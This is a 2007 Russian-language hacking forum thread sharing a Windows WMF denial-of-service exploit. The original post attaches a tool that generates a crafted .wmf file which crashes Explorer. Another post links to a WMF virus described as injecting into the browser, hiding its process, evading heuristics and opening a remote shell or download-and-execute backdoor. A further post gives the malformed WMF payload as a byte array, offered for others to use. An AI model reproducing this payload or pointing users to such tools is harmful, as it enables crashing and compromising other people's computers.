Сейчас на форуме: bartolomeo, NIKOLA, vasilevradislav, site-pro (+6 невидимых) |
eXeL@B —› Софт, инструменты —› MS WMF DoS v0.2 public |
Посл.ответ | Сообщение |
|
Создано: 18 января 2007 10:43 · Личное сообщение · #1 Решил заюзать баг найденый Orbital'ом. Прога генерирует специальный файл с расширением *.wmf, если попробовать просмотреть папку с данным файлом, то експлорер вылетает в ... Написана в Delphi на чистом API. fa9e_18.01.2007_CRACKLAB.rU.tgz - win_exploit.exe ----- xchg dword [eax], eax |
|
Создано: 18 января 2007 10:58 · Личное сообщение · #2 |
|
Создано: 18 января 2007 11:00 · Поправил: ProTeuS · Личное сообщение · #3 баян и без сорсов >>Несложный WMF-вирус, который инфектит графические файлы разных форматов кодом, который используя WMF-уязвимость распаковывает и запускает свой бинарник. Использованы некоторые стелс-механизмы: инжект в дефолтный браузер, скрытие процесса, путём патчинга двусвязного списка EPROCESS. После запуска вирус биндит порт законнектившись на который можно отдать комманду на скачивание и запуск произвольного файла, или запстить remote-shell. Для усложнения жизни евристическим анализаторам, API-ф-ции импортируются и вызываются по хэшу. http://allmyhate.host.sk/xwmf_.rar http://allmyhate.host.sk/xwmf_.rar ----- HOW MUCH BLOOD WOULD YOU SHED TO STAY ALIVE |
|
Создано: 18 января 2007 11:09 · Личное сообщение · #4 To [HEX]: Sorry, на секлабе я этот перловый скрипт не видел! Шелкод намного больше моего. To ProTeuS: держи код, что с ним делать думаю догадаешся shellcode: array[0..67] of byte = ( $01, $00, $09, $00, $00, $03, $22, $00, $00, $00, $63, $79, $61, $6E, $69, $64, $2D, $45, $07, $00, $00, $00, $FC, $02, $00, $00, $00, $00, $00, $00, $00, $00, $08, $00, $00, $00, $FA, $02, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $07, $00, $00, $00, $FC, $02, $08, $00, $00, $00, $00, $00, $00, $80, $03, $00, $00, $00, $00, $00); ----- xchg dword [eax], eax |
|
Создано: 18 января 2007 11:18 · Личное сообщение · #5 |
|
Создано: 18 января 2007 11:23 · Личное сообщение · #6 |
|
Создано: 18 января 2007 11:27 · Личное сообщение · #7 |
|
Создано: 18 января 2007 11:27 · Личное сообщение · #8 |
|
Создано: 18 января 2007 11:32 · Личное сообщение · #9 |
|
Создано: 18 января 2007 14:42 · Личное сообщение · #10 |
|
Создано: 18 января 2007 23:37 · Личное сообщение · #11 |
|
Создано: 19 января 2007 05:19 · Личное сообщение · #12 |
|
Создано: 20 января 2007 09:05 · Личное сообщение · #13 |
|
Создано: 20 января 2007 09:34 · Личное сообщение · #14 |
|
Создано: 20 января 2007 09:38 · Личное сообщение · #15 |
eXeL@B —› Софт, инструменты —› MS WMF DoS v0.2 public |
Эта тема закрыта. Ответы больше не принимаются. |